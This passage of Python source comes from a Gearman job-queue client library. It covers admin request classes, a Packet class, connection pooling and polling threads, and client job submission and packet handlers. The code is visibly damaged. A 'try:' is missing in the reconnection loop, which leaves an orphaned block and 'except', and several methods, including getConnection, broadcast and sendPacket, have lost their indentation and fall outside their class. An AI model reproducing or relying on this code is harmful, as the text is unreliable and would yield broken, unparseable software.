    command = b'status'

    def __init__(self):
        # The bare "status" command takes no arguments.
        super(StatusAdminRequest, self).__init__()
class ShowJobsAdminRequest(AdminRequest):
    """A "show jobs" administrative request.

    The response from gearman may be found in the **response** attribute.
    """
    command = b'show jobs'

    def __init__(self):
        # "show jobs" takes no arguments.
        super(ShowJobsAdminRequest, self).__init__()
class ShowUniqueJobsAdminRequest(AdminRequest):
    """A "show unique jobs" administrative request.

    The response from gearman may be found in the **response** attribute.
    """
    command = b'show unique jobs'

    def __init__(self):
        # "show unique jobs" takes no arguments.
        super(ShowUniqueJobsAdminRequest, self).__init__()
class CancelJobAdminRequest(AdminRequest):
    """A "cancel job" administrative request.

    :arg str handle: The job handle to be canceled.

    The response from gearman may be found in the **response** attribute.
    """
    command = b'cancel job'

    def __init__(self, handle):
        # The handle may arrive as text; normalize it to bytes first.
        super(CancelJobAdminRequest, self).__init__(convert_to_bytes(handle))

    def isComplete(self, data):
        """Check for the complete single-line response.

        :returns: (True, remainder) once a newline has been seen,
            otherwise (False, None).
        """
        line, newline, remainder = data.partition(b'\n')
        if not newline:
            return (False, None)
        self.response = line + newline
        return (True, remainder)
class VersionAdminRequest(AdminRequest):
    """A "version" administrative request.

    The response from gearman may be found in the **response** attribute.
    """
    command = b'version'

    def __init__(self):
        # "version" takes no arguments.
        super(VersionAdminRequest, self).__init__()

    def isComplete(self, data):
        # Unlike the multi-line commands, the version response is a single
        # line terminated by the first newline.
        end_index_newline = data.find(b'\n')
        if end_index_newline != -1:
            x = end_index_newline + 1
            self.response = data[:x]
            return (True, data[x:])
        else:
            return (False, None)
class WorkersAdminRequest(AdminRequest):
    """A "workers" administrative request.

    The response from gearman may be found in the **response** attribute.
    """
    command = b'workers'

    def __init__(self):
        # "workers" takes no arguments.
        super(WorkersAdminRequest, self).__init__()
class Packet(object):
    """A data packet received from or to be sent over a
    :py:class:`Connection`.

    :arg bytes code: The Gearman magic code (:py:data:`constants.REQ` or
        :py:data:`constants.RES`)
    :arg bytes ptype: The packet type (one of the packet types in
        constants).
    :arg bytes data: The data portion of the packet.
    :arg Connection connection: The connection on which the packet
        was received (optional).
    :raises InvalidDataError: If the magic code is unknown.
    """

    def __init__(self, code, ptype, data, connection=None):
        if not isinstance(code, bytes) and not isinstance(code, bytearray):
            raise TypeError("code must be of type bytes or bytearray")
        # Both magic codes (REQ and RES) begin with a NUL byte.
        if code[0:1] != b'\x00':
            raise InvalidDataError("First byte of packet must be 0")
        self.code = code
        self.ptype = ptype
        if not isinstance(data, bytes) and not isinstance(data, bytearray):
            raise TypeError("data must be of type bytes or bytearray")
        self.data = data
        self.connection = connection

    def __repr__(self):
        ptype = constants.types.get(self.ptype, 'UNKNOWN')
        try:
            extra = self._formatExtraData()
        except Exception:
            extra = ''
        return '<gear.Packet 0x%x type: %s%s>' % (id(self), ptype, extra)

    def __eq__(self, other):
        # Packets are equal when code, type and payload match; the
        # originating connection is deliberately ignored.
        if not isinstance(other, Packet):
            return False
        if (self.code == other.code and
            self.ptype == other.ptype and
            self.data == other.data):
            return True
        return False

    def __ne__(self, other):
        return not self.__eq__(other)

    def _formatExtraData(self):
        # Build a human-readable suffix for __repr__ based on the known
        # argument layout of each packet type.
        if self.ptype in [constants.JOB_CREATED,
                          constants.JOB_ASSIGN,
                          constants.GET_STATUS,
                          constants.STATUS_RES,
                          constants.WORK_STATUS,
                          constants.WORK_COMPLETE,
                          constants.WORK_FAIL,
                          constants.WORK_EXCEPTION,
                          constants.WORK_DATA,
                          constants.WORK_WARNING]:
            return ' handle: %s' % self.getArgument(0)
        if self.ptype == constants.JOB_ASSIGN_UNIQ:
            return (' handle: %s function: %s unique: %s' %
                    (self.getArgument(0),
                     self.getArgument(1),
                     self.getArgument(2)))
        if self.ptype in [constants.SUBMIT_JOB,
                          constants.SUBMIT_JOB_BG,
                          constants.SUBMIT_JOB_HIGH,
                          constants.SUBMIT_JOB_HIGH_BG,
                          constants.SUBMIT_JOB_LOW,
                          constants.SUBMIT_JOB_LOW_BG,
                          constants.SUBMIT_JOB_SCHED,
                          constants.SUBMIT_JOB_EPOCH]:
            return ' function: %s unique: %s' % (self.getArgument(0),
                                                 self.getArgument(1))
        if self.ptype in [constants.CAN_DO,
                          constants.CANT_DO,
                          constants.CAN_DO_TIMEOUT]:
            return ' function: %s' % (self.getArgument(0),)
        if self.ptype == constants.SET_CLIENT_ID:
            return ' id: %s' % (self.getArgument(0),)
        if self.ptype in [constants.OPTION_REQ,
                          constants.OPTION_RES]:
            return ' option: %s' % (self.getArgument(0),)
        if self.ptype == constants.ERROR:
            return ' code: %s message: %s' % (self.getArgument(0),
                                              self.getArgument(1))
        return ''

    def toBinary(self):
        """Return a Gearman wire protocol binary representation of the packet.

        :returns: The packet in binary form (12-byte header plus payload).
        :rtype: bytearray
        """
        b = struct.pack('!4sii', self.code, self.ptype, len(self.data))
        b = bytearray(b)
        b += self.data
        return b

    def getArgument(self, index, last=False):
        """Get the nth argument from the packet data.

        :arg int index: The argument index to look up.
        :arg bool last: Whether this is the last argument (and thus
            nulls should be ignored)
        :returns: The argument value.
        :rtype: bytes
        """
        parts = self.data.split(b'\x00')
        if not last:
            return parts[index]
        # The final argument may itself contain NUL bytes; rejoin them.
        return b'\x00'.join(parts[index:])

    def getJob(self):
        """Get the :py:class:`Job` associated with the job handle in
        this packet.

        :returns: The :py:class:`Job` for this packet.
        :rtype: Job
        :raises UnknownJobError: If the job is not known.
        """
        handle = self.getArgument(0)
        job = self.connection.related_jobs.get(handle)
        if not job:
            raise UnknownJobError()
        return job
class BaseClientServer(object):
    """Common machinery shared by clients and workers: connection pools,
    the reconnect thread, the poll thread and packet dispatch.

    :arg str client_id: The client ID to report to the server (optional).
    """

    def __init__(self, client_id=None):
        if client_id:
            self.client_id = convert_to_bytes(client_id)
            self.log = logging.getLogger("gear.BaseClientServer.%s" %
                                         (self.client_id,))
        else:
            self.client_id = None
            self.log = logging.getLogger("gear.BaseClientServer")
        self.running = True
        # Connections currently usable vs. those awaiting reconnection.
        self.active_connections = []
        self.inactive_connections = []
        # Round-robin pointer used by getConnection().
        self.connection_index = -1
        # A lock and notification mechanism to handle not having any
        # current connections
        self.connections_condition = threading.Condition()
        # A pipe to wake up the poll loop in case it needs to restart
        self.wake_read, self.wake_write = os.pipe()
        self.poll_thread = threading.Thread(name="Gearman client poll",
                                            target=self._doPollLoop)
        self.poll_thread.daemon = True
        self.poll_thread.start()
        self.connect_thread = threading.Thread(name="Gearman client connect",
                                               target=self._doConnectLoop)
        self.connect_thread.daemon = True
        self.connect_thread.start()

    def _doConnectLoop(self):
        # Outer run method of the reconnection thread
        while self.running:
            self.connections_condition.acquire()
            while self.running and not self.inactive_connections:
                self.log.debug("Waiting for change in available servers "
                               "to reconnect")
                self.connections_condition.wait()
            self.connections_condition.release()
            self.log.debug("Checking if servers need to be reconnected")
            try:
                if self.running and not self._connectLoop():
                    # Nothing happened
                    time.sleep(2)
            except Exception:
                self.log.exception("Exception in connect loop:")

    def _connectLoop(self):
        # Inner method of the reconnection loop, triggered by
        # a connection change
        success = False
        # Iterate over a copy so connections can be moved between lists.
        for conn in self.inactive_connections[:]:
            self.log.debug("Trying to reconnect %s" % conn)
            try:
                conn.reconnect()
            except ConnectionError:
                self.log.debug("Unable to connect to %s" % conn)
                continue
            except Exception:
                self.log.exception("Exception while connecting to %s" % conn)
            try:
                self._onConnect(conn)
            except Exception:
                self.log.exception("Exception while performing on-connect "
                                   "tasks for %s" % conn)
            self.connections_condition.acquire()
            self.inactive_connections.remove(conn)
            self.active_connections.append(conn)
            self.connections_condition.notifyAll()
            # Wake the poll loop so it starts watching the new socket.
            os.write(self.wake_write, b'1\n')
            self.connections_condition.release()
                self._onActiveConnection(conn)
            except Exception:
                self.log.exception("Exception while performing active conn "
                                   "tasks for %s" % conn)
            success = True
        return success

    def _onConnect(self, conn):
        # Called immediately after a successful (re-)connection
        pass

    def _onActiveConnection(self, conn):
        # Called immediately after a connection is activated
        pass

    def _lostConnection(self, conn):
        # Called as soon as a connection is detected as faulty.  Remove
        # it and return ASAP and let the connection thread deal with it.
        self.log.debug("Marking %s as disconnected" % conn)
        self.connections_condition.acquire()
        try:
            # NOTE(notmorgan): In the loop below it is possible to change the
            # jobs list on the connection. In python 3 .values() is an iter not
            # a static list, meaning that a change will break the for loop
            # as the object being iterated on will have changed in size.
            jobs = list(conn.related_jobs.values())
            if conn in self.active_connections:
                self.active_connections.remove(conn)
            if conn not in self.inactive_connections:
                self.inactive_connections.append(conn)
        finally:
            self.connections_condition.notifyAll()
            self.connections_condition.release()
        for job in jobs:
            self.handleDisconnect(job)

    def _doPollLoop(self):
        # Outer run method of poll thread.
        while self.running:
            self.connections_condition.acquire()
            while self.running and not self.active_connections:
                self.log.debug("Waiting for change in available connections "
                               "to poll")
                self.connections_condition.wait()
            self.connections_condition.release()
            try:
                self._pollLoop()
            except socket.error as e:
                if e.errno == errno.ECONNRESET:
                    self.log.debug("Connection reset by peer")
                    # This will get logged later at info level as
                    # "Marking ... as disconnected"
            except Exception:
                self.log.exception("Exception in poll loop:")

    def _pollLoop(self):
        # Inner method of poll loop
        self.log.debug("Preparing to poll")
        poll = select.poll()
        bitmask = (select.POLLIN | select.POLLERR |
                   select.POLLHUP | select.POLLNVAL)
        # Reverse mapping of fd -> connection
        conn_dict = {}
        for conn in self.active_connections:
            poll.register(conn.conn.fileno(), bitmask)
            conn_dict[conn.conn.fileno()] = conn
        # Register the wake pipe so that we can break if we need to
        # reconfigure connections
        poll.register(self.wake_read, bitmask)
        while self.running:
            self.log.debug("Polling %s connections" %
                           len(self.active_connections))
            ret = poll.poll()
            for fd, event in ret:
                if fd == self.wake_read:
                    self.log.debug("Woken by pipe")
                    # Drain the pipe up to the newline, then return so the
                    # outer loop re-registers the current connection set.
                    while True:
                        if os.read(self.wake_read, 1) == b'\n':
                            break
                    return
                conn = conn_dict[fd]
                if event & select.POLLIN:
                    # Process all packets that may have been read in this
                    # round of recv's by readPacket.
                    while True:
                        self.log.debug("Processing input on %s" % conn)
                        p = conn.readPacket()
                        if p:
                            if isinstance(p, Packet):
                                self.handlePacket(p)
                            else:
                                self.handleAdminRequest(p)
                        else:
                            self.log.debug("Received no data on %s" % conn)
                            self._lostConnection(conn)
                            return
                        if not conn.hasPendingData():
                            break
                else:
                    self.log.debug("Received error event on %s" % conn)
                    self._lostConnection(conn)
                    return

    def handlePacket(self, packet):
        """Handle a received packet.

        This method is called whenever a packet is received from any
        connection.  It normally calls the handle method appropriate
        for the specific packet.

        :arg Packet packet: The :py:class:`Packet` that was received.
        """
        self.log.info("Received packet from %s: %s" % (packet.connection,
                                                       packet))
        start = time.time()
        if packet.ptype == constants.JOB_CREATED:
            self.handleJobCreated(packet)
        elif packet.ptype == constants.WORK_COMPLETE:
            self.handleWorkComplete(packet)
        elif packet.ptype == constants.WORK_FAIL:
            self.handleWorkFail(packet)
        elif packet.ptype == constants.WORK_EXCEPTION:
            self.handleWorkException(packet)
        elif packet.ptype == constants.WORK_DATA:
            self.handleWorkData(packet)
        elif packet.ptype == constants.WORK_WARNING:
            self.handleWorkWarning(packet)
        elif packet.ptype == constants.WORK_STATUS:
            self.handleWorkStatus(packet)
        elif packet.ptype == constants.STATUS_RES:
            self.handleStatusRes(packet)
        elif packet.ptype == constants.GET_STATUS:
            self.handleGetStatus(packet)
        elif packet.ptype == constants.JOB_ASSIGN_UNIQ:
            self.handleJobAssignUnique(packet)
        elif packet.ptype == constants.JOB_ASSIGN:
            self.handleJobAssign(packet)
        elif packet.ptype == constants.NO_JOB:
            self.handleNoJob(packet)
        elif packet.ptype == constants.NOOP:
            self.handleNoop(packet)
        elif packet.ptype == constants.SUBMIT_JOB:
            self.handleSubmitJob(packet)
        elif packet.ptype == constants.SUBMIT_JOB_BG:
            self.handleSubmitJobBg(packet)
        elif packet.ptype == constants.SUBMIT_JOB_HIGH:
            self.handleSubmitJobHigh(packet)
        elif packet.ptype == constants.SUBMIT_JOB_HIGH_BG:
            self.handleSubmitJobHighBg(packet)
        elif packet.ptype == constants.SUBMIT_JOB_LOW:
            self.handleSubmitJobLow(packet)
        elif packet.ptype == constants.SUBMIT_JOB_LOW_BG:
            self.handleSubmitJobLowBg(packet)
        elif packet.ptype == constants.SUBMIT_JOB_SCHED:
            self.handleSubmitJobSched(packet)
        elif packet.ptype == constants.SUBMIT_JOB_EPOCH:
            self.handleSubmitJobEpoch(packet)
        elif packet.ptype == constants.GRAB_JOB_UNIQ:
            self.handleGrabJobUniq(packet)
        elif packet.ptype == constants.GRAB_JOB:
            self.handleGrabJob(packet)
        elif packet.ptype == constants.PRE_SLEEP:
            self.handlePreSleep(packet)
        elif packet.ptype == constants.SET_CLIENT_ID:
            self.handleSetClientID(packet)
        elif packet.ptype == constants.CAN_DO:
            self.handleCanDo(packet)
        elif packet.ptype == constants.CAN_DO_TIMEOUT:
            self.handleCanDoTimeout(packet)
        elif packet.ptype == constants.CANT_DO:
            self.handleCantDo(packet)
        elif packet.ptype == constants.RESET_ABILITIES:
            self.handleResetAbilities(packet)
        elif packet.ptype == constants.ECHO_REQ:
            self.handleEchoReq(packet)
        elif packet.ptype == constants.ECHO_RES:
            self.handleEchoRes(packet)
        elif packet.ptype == constants.ERROR:
            self.handleError(packet)
        elif packet.ptype == constants.ALL_YOURS:
            self.handleAllYours(packet)
        elif packet.ptype == constants.OPTION_REQ:
            self.handleOptionReq(packet)
        elif packet.ptype == constants.OPTION_RES:
            self.handleOptionRes(packet)
        else:
            self.log.error("Received unknown packet: %s" % packet)
        end = time.time()
        self.reportTimingStats(packet.ptype, end - start)

    def handleDisconnect(self, job):
        """Handle a Gearman server disconnection.

        If the Gearman server is disconnected, this will be called for any
        jobs currently associated with the server.

        :arg Job packet: The :py:class:`Job` that was running when the server
            disconnected.
        """
        return job

    def reportTimingStats(self, ptype, duration):
        """Report processing times by packet type

        This method is called by handlePacket to report how long
        processing took for each packet.  The default implementation
        does nothing.

        :arg bytes ptype: The packet type (one of the packet types in
            constants).
        :arg float duration: The time (in seconds) it took to process
            the packet.
        """
        pass

    def _defaultPacketHandler(self, packet):
        # Fallback for packet types a subclass has not overridden.
        self.log.error("Received unhandled packet: %s" % packet)

    def handleJobCreated(self, packet):
        return self._defaultPacketHandler(packet)

    def handleWorkComplete(self, packet):
        return self._defaultPacketHandler(packet)

    def handleWorkFail(self, packet):
        return self._defaultPacketHandler(packet)

    def handleWorkException(self, packet):
        return self._defaultPacketHandler(packet)

    def handleWorkData(self, packet):
        return self._defaultPacketHandler(packet)

    def handleWorkWarning(self, packet):
        return self._defaultPacketHandler(packet)

    def handleWorkStatus(self, packet):
        return self._defaultPacketHandler(packet)

    def handleStatusRes(self, packet):
        return self._defaultPacketHandler(packet)

    def handleGetStatus(self, packet):
        return self._defaultPacketHandler(packet)

    def handleJobAssignUnique(self, packet):
        return self._defaultPacketHandler(packet)

    def handleJobAssign(self, packet):
        return self._defaultPacketHandler(packet)

    def handleNoJob(self, packet):
        return self._defaultPacketHandler(packet)

    def handleNoop(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJob(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobBg(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobHigh(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobHighBg(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobLow(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobLowBg(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobSched(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSubmitJobEpoch(self, packet):
        return self._defaultPacketHandler(packet)

    def handleGrabJobUniq(self, packet):
        return self._defaultPacketHandler(packet)

    def handleGrabJob(self, packet):
        return self._defaultPacketHandler(packet)

    def handlePreSleep(self, packet):
        return self._defaultPacketHandler(packet)

    def handleSetClientID(self, packet):
        return self._defaultPacketHandler(packet)

    def handleCanDo(self, packet):
        return self._defaultPacketHandler(packet)

    def handleCanDoTimeout(self, packet):
        return self._defaultPacketHandler(packet)

    def handleCantDo(self, packet):
        return self._defaultPacketHandler(packet)

    def handleResetAbilities(self, packet):
        return self._defaultPacketHandler(packet)

    def handleEchoReq(self, packet):
        return self._defaultPacketHandler(packet)

    def handleEchoRes(self, packet):
        return self._defaultPacketHandler(packet)

    def handleError(self, packet):
        return self._defaultPacketHandler(packet)

    def handleAllYours(self, packet):
        return self._defaultPacketHandler(packet)

    def handleOptionReq(self, packet):
        return self._defaultPacketHandler(packet)

    def handleOptionRes(self, packet):
        return self._defaultPacketHandler(packet)

    def handleAdminRequest(self, request):
        """Handle an administrative command response from Gearman.

        This method is called whenever a response to a previously
        issued administrative command is received from one of this
        client's connections.  It normally releases the wait lock on
        the initiating AdminRequest object.

        :arg AdminRequest request: The :py:class:`AdminRequest` that
            initiated the received response.
        """
        self.log.info("Received admin data %s" % request)
        request.setComplete()

    def shutdown(self):
        """Close all connections and stop all running threads.

        The object may no longer be used after shutdown is called.
        """
        if self.running:
            self.log.debug("Beginning shutdown")
            self._shutdown()
            self.log.debug("Beginning cleanup")
            self._cleanup()
            self.log.debug("Finished shutdown")
        else:
            self.log.warning("Shutdown called when not currently running. "
                             "Ignoring.")

    def _shutdown(self):
        # The first part of the shutdown process where all threads
        # are told to exit.
        self.running = False
        self.connections_condition.acquire()
        try:
            self.connections_condition.notifyAll()
            # Wake the poll loop so it notices self.running is False.
            os.write(self.wake_write, b'1\n')
        finally:
            self.connections_condition.release()

    def _cleanup(self):
        # The second part of the shutdown process where we wait for all
        # threads to exit and then clean up.
        self.poll_thread.join()
        self.connect_thread.join()
        for connection in self.active_connections:
            connection.disconnect()
        self.active_connections = []
        self.inactive_connections = []
        os.close(self.wake_read)
        os.close(self.wake_write)
class BaseClient(BaseClientServer):
    def __init__(self, client_id='unknown'):
        """Initialize the client and start its poll/connect threads.

        :arg str client_id: The client ID to report to servers
            (default: 'unknown').
        """
        super(BaseClient, self).__init__(client_id)
        self.log = logging.getLogger("gear.BaseClient.%s" % (self.client_id,))
        # A lock to use when sending packets that set the state across
        # all known connections.  Note that it doesn't necessarily need
        # to be used for all broadcasts, only those that affect multi-
        # connection state, such as setting options or functions.
        self.broadcast_lock = threading.RLock()
    def addServer(self, host, port=4730,
                  ssl_key=None, ssl_cert=None, ssl_ca=None,
                  keepalive=False, tcp_keepidle=7200, tcp_keepintvl=75,
                  tcp_keepcnt=9):
        """Add a server to the client's connection pool.

        Any number of Gearman servers may be added to a client.  The
        client will connect to all of them and send jobs to them in a
        round-robin fashion.  When servers are disconnected, the
        client will automatically remove them from the pool,
        continuously try to reconnect to them, and return them to the
        pool when reconnected.  New servers may be added at any time.

        This is a non-blocking call that will return regardless of
        whether the initial connection succeeded.  If you need to
        ensure that a connection is ready before proceeding, see
        :py:meth:`waitForServer`.

        When using SSL connections, all SSL files must be specified.

        :arg str host: The hostname or IP address of the server.
        :arg int port: The port on which the gearman server is listening.
        :arg str ssl_key: Path to the SSL private key.
        :arg str ssl_cert: Path to the SSL certificate.
        :arg str ssl_ca: Path to the CA certificate.
        :arg bool keepalive: Whether to use TCP keepalives
        :arg int tcp_keepidle: Idle time after which to start keepalives
            sending
        :arg int tcp_keepintvl: Interval in seconds between TCP keepalives
        :arg int tcp_keepcnt: Count of TCP keepalives to send before disconnect
        :raises ConfigurationError: If the host/port combination has
            already been added to the client.
        """
        self.log.debug("Adding server %s port %s" % (host, port))
        self.connections_condition.acquire()
        try:
            # Reject duplicates across both the active and inactive pools.
            for conn in self.active_connections + self.inactive_connections:
                if conn.host == host and conn.port == port:
                    raise ConfigurationError("Host/port already specified")
            conn = NonBlockingConnection(host, port, ssl_key, ssl_cert, ssl_ca,
                                         self.client_id, keepalive,
                                         tcp_keepidle, tcp_keepintvl,
                                         tcp_keepcnt)
            # New connections start inactive; the connect thread is woken
            # to establish them.
            self.inactive_connections.append(conn)
            self.connections_condition.notifyAll()
        finally:
            self.connections_condition.release()
def _checkTimeout(self, start_time, timeout):
if time.time() - start_time > timeout:
raise TimeoutError()
    def waitForServer(self, timeout=None):
        """Wait for at least one server to be connected.
        Block until at least one gearman server is connected.
        :arg numeric timeout: Number of seconds to wait for a connection.
            If None, wait forever (default: no timeout).
        :raises TimeoutError: If the timeout is reached before any server
            connects.
        """
        connected = False
        start_time = time.time()
        while self.running:
            self.connections_condition.acquire()
            try:
                # Sleep on the condition variable until another thread
                # moves a connection into active_connections (or this
                # client stops running).  The 1-second wait bounds how
                # long a missed notification can delay us.
                while self.running and not self.active_connections:
                    if timeout is not None:
                        # Raises TimeoutError; the finally clause below
                        # still releases the lock in that case.
                        self._checkTimeout(start_time, timeout)
                    self.log.debug("Waiting for at least one active "
                                   "connection")
                    self.connections_condition.wait(timeout=1)
                if self.active_connections:
                    self.log.debug("Active connection found")
                    connected = True
            finally:
                self.connections_condition.release()
            if connected:
                return
def getConnection(self):
"""Return a connected server.
Finds the next scheduled connected server in the round-robin
rotation and returns it. It is not usually necessary to use
this method external to the library, as more consumer-oriented
methods such as submitJob already use it internally, but is
available nonetheless if necessary.
:returns: The next scheduled :py:class:`Connection` object.
:rtype: :py:class:`Connection`
:raises NoConnectedServersError: If there are not currently
connected servers.
"""
conn = None
try:
self.connections_condition.acquire()
if not self.active_connections:
raise NoConnectedServersError("No connected Gearman servers")
self.connection_index += 1
if self.connection_index >= len(self.active_connections):
self.connection_index = 0
conn = self.active_connections[self.connection_index]
finally:
self.connections_condition.release()
return conn
def broadcast(self, packet):
"""Send a packet to all currently connected servers.
:arg Packet packet: The :py:class:`Packet` to send.
"""
connections = self.active_connections[:]
for connection in connections:
try:
self.sendPacket(packet, connection)
except Exception:
# Error handling is all done by sendPacket
pass
def sendPacket(self, packet, connection):
"""Send a packet to a single connection, removing it from the
list of active connections if that fails.
:arg Packet packet: The :py:class:`Packet` to send.
:arg Connection connection: The :py:class:`Connection` on
which to send the packet.
"""
try:
connection.sendPacket(packet)
return
except Exception:
self.log.exception("Exception while sending packet %s to %s" %
(packet, connection))
# If we can't send the packet, discard the connection
self._lostConnection(connection)
raise
def handleEchoRes(self, packet):
"""Handle an ECHO_RES packet.
Causes the blocking :py:meth:`Connection.echo` invocation to
return.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: None
"""
packet.connection.handleEchoRes(packet.getArgument(0, True))
def handleError(self, packet):
"""Handle an ERROR packet.
Logs the error.
:arg Packet packet: The :py:class:`Packet` that was received.
:returns: None
"""
self.log.error("Received ERROR packet: %s: %s" %
(packet.getArgument(0),
packet.getArgument(1)))
try:
task = packet.connection.pending_tasks.pop(0)
task.setComplete()
except Exception:
self.log.exception("Exception while handling error packet:")
self._lostConnection(packet.connection)
class Client(BaseClient):
    """A Gearman client.

    You may wish to subclass this class in order to override the
    default event handlers to react to Gearman events.  Be sure to
    call the superclass event handlers so that they may perform
    job-related housekeeping.

    :arg str client_id: The client ID to provide to Gearman.  It will
        appear in administrative output and be appended to the name of
        the logger (e.g., gear.Client.client_id).  Defaults to
        'unknown'.
    """
    def __init__(self, client_id='unknown'):
        super(Client, self).__init__(client_id)
        self.log = logging.getLogger("gear.Client.%s" % (self.client_id,))
        # Option names (bytes) requested via setOption(); replayed to
        # every connection on (re-)connect by _onConnect().
        self.options = set()
    def __repr__(self):
        return '<gear.Client 0x%x>' % id(self)
    def _onConnect(self, conn):
        # Called immediately after a successful (re-)connection
        self.broadcast_lock.acquire()
        try:
            super(Client, self)._onConnect(conn)
            # Re-apply all previously requested options to the new
            # connection so reconnects behave like the original ones.
            for name in self.options:
                self._setOptionConnection(name, conn)
        finally:
            self.broadcast_lock.release()
    def _setOptionConnection(self, name, conn):
        # Set an option on a connection
        packet = Packet(constants.REQ, constants.OPTION_REQ, name)
        task = OptionReqTask()
        try:
            conn.pending_tasks.append(task)
            self.sendPacket(packet, conn)
        except Exception:
            # Error handling is all done by sendPacket
            task = None
        return task
    def setOption(self, name, timeout=30):
        """Set an option for all connections.

        :arg str name: The option name to set.
        :arg int timeout: How long to wait (in seconds) for a response
            from the server before giving up (default: 30 seconds).
        :returns: True if the option was set on all connections,
            otherwise False
        :rtype: bool
        """
        tasks = {}
        name = convert_to_bytes(name)
        self.broadcast_lock.acquire()
        try:
            # Remember the option so _onConnect() replays it after a
            # reconnect.
            self.options.add(name)
            connections = self.active_connections[:]
            for connection in connections:
                task = self._setOptionConnection(name, connection)
                if task:
                    tasks[task] = connection
        finally:
            self.broadcast_lock.release()
        success = True
        for task in tasks.keys():
            complete = task.wait(timeout)
            conn = tasks[task]
            if not complete:
                # A connection that times out is dropped from the pool;
                # it does not count against the success result.
                self.log.error("Connection %s timed out waiting for a "
                               "response to an option request: %s" %
                               (conn, name))
                self._lostConnection(conn)
                continue
            if name not in conn.options:
                success = False
        return success
    def submitJob(self, job, background=False, precedence=PRECEDENCE_NORMAL,
                  timeout=30):
        """Submit a job to a Gearman server.

        Submits the provided job to the next server in this client's
        round-robin connection pool.

        If the job is a foreground job, updates will be made to the
        supplied :py:class:`Job` object as they are received.

        :arg Job job: The :py:class:`Job` to submit.
        :arg bool background: Whether the job should be backgrounded.
        :arg int precedence: Whether the job should have normal, low, or
            high precedence.  One of :py:data:`PRECEDENCE_NORMAL`,
            :py:data:`PRECEDENCE_LOW`, or :py:data:`PRECEDENCE_HIGH`
        :arg int timeout: How long to wait (in seconds) for a response
            from the server before giving up (default: 30 seconds).
        :raises ConfigurationError: If an invalid precedence value
            is supplied.
        """
        if job.unique is None:
            unique = b''
        else:
            unique = job.binary_unique
        # Wire format: NUL-separated function name, unique ID, arguments.
        data = b'\x00'.join((job.binary_name, unique, job.binary_arguments))
        if background:
            if precedence == PRECEDENCE_NORMAL:
                cmd = constants.SUBMIT_JOB_BG
            elif precedence == PRECEDENCE_LOW:
                cmd = constants.SUBMIT_JOB_LOW_BG
            elif precedence == PRECEDENCE_HIGH:
                cmd = constants.SUBMIT_JOB_HIGH_BG
            else:
                raise ConfigurationError("Invalid precedence value")
        else:
            if precedence == PRECEDENCE_NORMAL:
                cmd = constants.SUBMIT_JOB
            elif precedence == PRECEDENCE_LOW:
                cmd = constants.SUBMIT_JOB_LOW
            elif precedence == PRECEDENCE_HIGH:
                cmd = constants.SUBMIT_JOB_HIGH
            else:
                raise ConfigurationError("Invalid precedence value")
        packet = Packet(constants.REQ, cmd, data)
        attempted_connections = set()
        while True:
            # Give up once every currently-active connection has been
            # tried.
            if attempted_connections == set(self.active_connections):
                break
            conn = self.getConnection()
            task = SubmitJobTask(job)
            conn.pending_tasks.append(task)
            attempted_connections.add(conn)
            try:
                self.sendPacket(packet, conn)
            except Exception:
                # Error handling is all done by sendPacket
                continue
            # Wait for handleJobCreated() to complete the task.
            complete = task.wait(timeout)
            if not complete:
                self.log.error("Connection %s timed out waiting for a "
                               "response to a submit job request: %s" %
                               (conn, job))
                self._lostConnection(conn)
                continue
            if not job.handle:
                self.log.error("Connection %s sent an error in "
                               "response to a submit job request: %s" %
                               (conn, job))
                continue
            job.connection = conn
            return
        raise GearmanError("Unable to submit job to any connected servers")
    def handleJobCreated(self, packet):
        """Handle a JOB_CREATED packet.

        Updates the appropriate :py:class:`Job` with the newly
        returned job handle.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        # Responses arrive in submission order, so the oldest pending
        # task must be the SubmitJobTask this packet answers.
        task = packet.connection.pending_tasks.pop(0)
        if not isinstance(task, SubmitJobTask):
            msg = ("Unexpected response received to submit job "
                   "request: %s" % packet)
            self.log.error(msg)
            self._lostConnection(packet.connection)
            raise GearmanError(msg)
        job = task.job
        job.handle = packet.data
        packet.connection.related_jobs[job.handle] = job
        task.setComplete()
        self.log.debug("Job created; %s" % job)
        return job
    def handleWorkComplete(self, packet):
        """Handle a WORK_COMPLETE packet.

        Updates the referenced :py:class:`Job` with the returned data
        and removes it from the list of jobs associated with the
        connection.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        data = packet.getArgument(1, True)
        if data:
            job.data.append(data)
        job.complete = True
        job.failure = False
        # The job is finished; stop tracking it on this connection.
        del packet.connection.related_jobs[job.handle]
        self.log.debug("Job complete; %s data: %s" %
                       (job, job.data))
        return job
    def handleWorkFail(self, packet):
        """Handle a WORK_FAIL packet.

        Updates the referenced :py:class:`Job` with the returned data
        and removes it from the list of jobs associated with the
        connection.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        job.complete = True
        job.failure = True
        del packet.connection.related_jobs[job.handle]
        self.log.debug("Job failed; %s" % job)
        return job
    def handleWorkException(self, packet):
        """Handle a WORK_EXCEPTION packet.

        Updates the referenced :py:class:`Job` with the returned data
        and removes it from the list of jobs associated with the
        connection.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        job.exception = packet.getArgument(1, True)
        job.complete = True
        job.failure = True
        del packet.connection.related_jobs[job.handle]
        self.log.debug("Job exception; %s exception: %s" %
                       (job, job.exception))
        return job
    def handleWorkData(self, packet):
        """Handle a WORK_DATA packet.

        Updates the referenced :py:class:`Job` with the returned data.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        data = packet.getArgument(1, True)
        if data:
            job.data.append(data)
